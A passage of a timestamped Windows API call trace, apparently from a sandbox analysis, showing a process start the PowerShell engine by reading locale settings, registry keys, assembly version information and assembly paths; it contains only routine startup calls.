	[0373.804] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x460
	[0373.804] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16dd40 | out: lpdwProcessId=0x16dd40) returned 0x778
	[0373.808] WerSetFlags () returned 0x0
	[0373.816] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0373.816] CoTaskMemFree (pv=0x0) 
	[0373.817] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e0a0 | out: pulNumLanguages=0x16e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e0a0) returned 1
	[0373.817] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e0a8, pwszLanguagesBuffer=0x2c812b8, pcchLanguagesBuffer=0x16e0a0 | out: pulNumLanguages=0x16e0a8, pwszLanguagesBuffer=0x2c812b8, pcchLanguagesBuffer=0x16e0a0) returned 1
	[0373.822] CoTaskMemAlloc (cb=0x24) returned 0x34b3f0
	[0373.822] GetUserDefaultLocaleName (in: lpLocaleName=0x34b3f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0373.823] CoTaskMemFree (pv=0x34b3f0) 
	[0374.148] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0374.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0374.148] CoTaskMemFree (pv=0x34e250) 
	[0374.150] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0374.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0374.151] CoTaskMemFree (pv=0x34e250) 
	[0374.153] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0374.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0374.153] CoTaskMemFree (pv=0x34e250) 
	[0374.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.166] SetErrorMode (uMode=0x1) returned 0x1
	[0374.166] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dd20 | out: lpFileInformation=0x16dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0374.166] SetErrorMode (uMode=0x1) returned 0x1
	[0374.166] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16df90 | out: lpdwHandle=0x16df90) returned 0x94c
	[0374.167] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c84b48 | out: lpData=0x2c84b48) returned 1
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df08, puLen=0x16df00 | out: lplpBuffer=0x16df08*=0x2c84be4, puLen=0x16df00) returned 1
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84cc0, puLen=0x16de70) returned 1
	[0374.168] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0374.168] CoTaskMemAlloc (cb=0x2e) returned 0x35cbb0
	[0374.168] lstrcpyW (in: lpString1=0x35cbb0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0374.168] CoTaskMemFree (pv=0x35cbb0) 
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84d14, puLen=0x16de70) returned 1
	[0374.168] lstrlenW (lpString="System.Management.Automation") returned 28
	[0374.168] CoTaskMemAlloc (cb=0x3c) returned 0x2c90c0
	[0374.168] lstrcpyW (in: lpString1=0x2c90c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0374.168] CoTaskMemFree (pv=0x2c90c0) 
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84d70, puLen=0x16de70) returned 1
	[0374.168] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0374.168] CoTaskMemAlloc (cb=0x20) returned 0x3567a0
	[0374.168] lstrcpyW (in: lpString1=0x3567a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0374.168] CoTaskMemFree (pv=0x3567a0) 
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84db0, puLen=0x16de70) returned 1
	[0374.168] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0374.168] CoTaskMemAlloc (cb=0x44) returned 0x2c90c0
	[0374.168] lstrcpyW (in: lpString1=0x2c90c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0374.168] CoTaskMemFree (pv=0x2c90c0) 
	[0374.168] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84e18, puLen=0x16de70) returned 1
	[0374.168] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0374.168] CoTaskMemAlloc (cb=0x76) returned 0x2f9990
	[0374.168] lstrcpyW (in: lpString1=0x2f9990, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0374.168] CoTaskMemFree (pv=0x2f9990) 
	[0374.169] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84eb4, puLen=0x16de70) returned 1
	[0374.169] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0374.169] CoTaskMemAlloc (cb=0x44) returned 0x2c90c0
	[0374.169] lstrcpyW (in: lpString1=0x2c90c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0374.169] CoTaskMemFree (pv=0x2c90c0) 
	[0374.169] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84f18, puLen=0x16de70) returned 1
	[0374.169] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0374.169] CoTaskMemAlloc (cb=0x58) returned 0x315700
	[0374.169] lstrcpyW (in: lpString1=0x315700, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0374.169] CoTaskMemFree (pv=0x315700) 
	[0374.169] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84f94, puLen=0x16de70) returned 1
	[0374.169] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0374.169] CoTaskMemAlloc (cb=0x20) returned 0x3567a0
	[0374.169] lstrcpyW (in: lpString1=0x3567a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0374.170] CoTaskMemFree (pv=0x3567a0) 
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x2c84c3c, puLen=0x16de70) returned 1
	[0374.170] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0374.170] CoTaskMemAlloc (cb=0x66) returned 0x2cc3d0
	[0374.170] lstrcpyW (in: lpString1=0x2cc3d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0374.170] CoTaskMemFree (pv=0x2cc3d0) 
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x0, puLen=0x16de70) returned 0
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x0, puLen=0x16de70) returned 0
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16de78, puLen=0x16de70 | out: lplpBuffer=0x16de78*=0x0, puLen=0x16de70) returned 0
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de48, puLen=0x16de40 | out: lplpBuffer=0x16de48*=0x2c84be4, puLen=0x16de40) returned 1
	[0374.170] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0374.170] VerLanguageNameW (in: wLang=0x0, szLang=0x2f4ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0374.170] CoTaskMemFree (pv=0x2f4ad0) 
	[0374.170] VerQueryValueW (in: pBlock=0x2c84b48, lpSubBlock="\\", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2c84b70, puLen=0x16de90) returned 1
	[0374.179] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0374.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0374.179] CoTaskMemFree (pv=0x34e250) 
	[0374.183] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0374.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0374.183] CoTaskMemFree (pv=0x34e250) 
	[0374.186] lstrlenW (lpString="䅁") returned 1
	[0374.489] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd68 | out: phkResult=0x16dd68*=0x2f8) returned 0x0
	[0374.491] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd58 | out: phkResult=0x16dd58*=0x2fc) returned 0x0
	[0374.491] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dde8 | out: phkResult=0x16dde8*=0x300) returned 0x0
	[0374.495] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd2c, lpData=0x0, lpcbData=0x16dd28*=0x0 | out: lpType=0x16dd2c*=0x1, lpData=0x0, lpcbData=0x16dd28*=0x56) returned 0x0
	[0374.496] CoTaskMemAlloc (cb=0x5a) returned 0x302310
	[0374.496] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dcfc, lpData=0x302310, lpcbData=0x16dcf8*=0x56 | out: lpType=0x16dcfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dcf8*=0x56) returned 0x0
	[0374.496] CoTaskMemFree (pv=0x302310) 
	[0374.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.044] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0375.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.045] CoTaskMemFree (pv=0x34e250) 
	[0377.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0377.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0377.851] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0377.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0377.851] CoTaskMemFree (pv=0x34e360) 
	[0377.852] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0377.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0377.852] CoTaskMemFree (pv=0x34e360) 
	[0378.366] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0378.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.366] CoTaskMemFree (pv=0x34e360) 
	[0378.368] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0378.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.368] CoTaskMemFree (pv=0x34e360) 
	[0378.368] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0378.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.368] CoTaskMemFree (pv=0x34e360) 
	[0379.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0379.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0379.594] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0379.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.594] CoTaskMemFree (pv=0x34e360) 
	[0379.597] CoTaskMemAlloc (cb=0x104) returned 0x34e360
	[0379.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.597] CoTaskMemFree (pv=0x34e360) 
	[0380.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0384.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0384.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0384.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0385.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0385.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0385.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0385.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0385.958] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0385.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.958] CoTaskMemFree (pv=0x34e580) 
	[0385.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0385.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0385.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0386.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0386.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0386.325] SetErrorMode (uMode=0x1) returned 0x1
	[0386.325] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dcc0 | out: lpFileInformation=0x16dcc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0386.325] SetErrorMode (uMode=0x1) returned 0x1
	[0387.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
